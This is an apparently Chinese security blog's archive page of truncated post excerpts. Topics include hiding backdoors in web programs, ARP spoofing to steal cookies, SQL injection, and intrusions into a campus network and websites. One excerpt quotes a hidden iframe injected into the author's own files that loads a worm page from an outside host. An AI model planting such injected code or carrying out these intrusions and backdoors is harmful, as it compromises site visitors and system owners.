【IT168 专稿】今天,电子邮箱(E-mail)无疑已经成为大众通讯的工具;由于垃圾邮件泛滥,E-mail也成为信息安全的重大隐患之一。搜索到有效邮件地址成为垃圾邮件发送成功与否的决定要素。随着Ajax新兴技术在大型网站,如SOHU等得到应用,使得垃圾邮件制造者有机可乘。
现在浏览器端以[……]
分类存档: 原创文章 - 第8页
在WEB程序中隐藏后门
作者: 空虚浪子心 日期: 2007 年 04 月 14 日 没有评论 | 5,169 views
作者: 空虚浪子心
在很多商业程序中,程序员也许会出于某种目的,在程序中留下后门。我们不讨论这样做的目的是什么,只谈谈如何在程序中隐藏一个“终极后门”。
首先给大家看一个例子,去年我写了一篇文章《对校园网的第二次安全检测,文中提到一个类似的后门:“…隐藏账户做后门!…如果不是我先拿到[……]
破熊猫…
作者: 空虚浪子心 日期: 2007 年 01 月 26 日 没有评论 | 4,483 views
前几天中了病毒…
EXE就不说了,我的大多EXE都有RAR的备份,竟然在我的asp.html,htm等文件中加入了
<iframe src=http://www.krvkr.com/worm.htm width=0 height=0></iframe>
NND…[……]
SQL 第七章 触发器 总结
作者: 空虚浪子心 日期: 2006 年 11 月 09 日 没有评论 | 4,654 views
potu周博通-资讯阅读器2.0(26060619)最新。漏洞
作者: 空虚浪子心 日期: 2006 年 07 月 22 日 没有评论 | 4,734 views
potu周博通-资讯阅读器2.0(26060619)最新。漏洞
周博通是目前最流行的免费RSS阅读器之一,界面友好,分类清晰,操作简单.内置新浪网、新华网、天极网、计世网等数百个RSS新闻源,不用打开网页就可第一时间阅读自己喜欢的新闻。
CDATA部件在XML里:
If your text co[……]
对校园网的第二次安全检测
作者: 空虚浪子心 日期: 2006 年 05 月 22 日 没有评论 | 6,199 views
文/ABEND@XUST[西京大学网络安全小组]
网络中心的唐老师曾说过要我们小组做西京网络的“网络狙击手”。而我本身就对学校网络很感兴趣,时常东敲敲西碰碰的。只不过这样子就比较合法化了。今天终于搞定了所有的服务器。
所谓黑客技术,精髓在于观察和思考。而准确地抓住机会,也是必要的步骤。就从我们宿[……]
黑防vip小缺陷获取VIP收费资源
作者: 空虚浪子心 日期: 2006 年 02 月 27 日 没有评论 | 6,221 views
文/ABEND@XUST 西京大学网络安全小组
黑防推出vip了,值得庆贺。像黑防这样的站,如果搞起来vip,一定比较好做,因为毕竟一开始就是有经济基础的。偶这样的穷学生也刚好跟着进去浑水摸鱼了一把。社会工程学的应用文章baidu上也是一堆一堆的。偶再来说几句吧。
先看看我们的目标:
www.h[……]
Arp欺骗截cookies入侵“中国黑客”网站
作者: 空虚浪子心 日期: 2006 年 02 月 27 日 没有评论 | 92,302 views
放假回家,暂时没有自己的电脑,只能跑网吧。打开ie就看见网吧主页。。。这个网吧是我家附近作的最好的。在这里玩过几次,也提醒过老板一些漏洞。不过漏洞天天更新么~
是个2级域名111.lzbiz.com。换成www,竟然是个黑客网站。。。名字叫做“中国黑客”哈。。。看来这里有黑客罩着。偶看看能不能挑战下[……]
我的web+asp攻击
作者: 空虚浪子心 日期: 2005 年 02 月 27 日 没有评论 | 6,428 views
asp+sql攻击大家已经耳熟能详了,大略攻击步骤像下面:
以上的总结,只是乱写的,只是我的个人经验,其中主要的是灵活运用,举几个简单的例子。
在access注入后有时候会遇到管理员才可以用的上传页面,就可以又直接执行前面一步,即检测asp上传漏洞。在mssql注入时,也许会遇到sa,却没有所[……]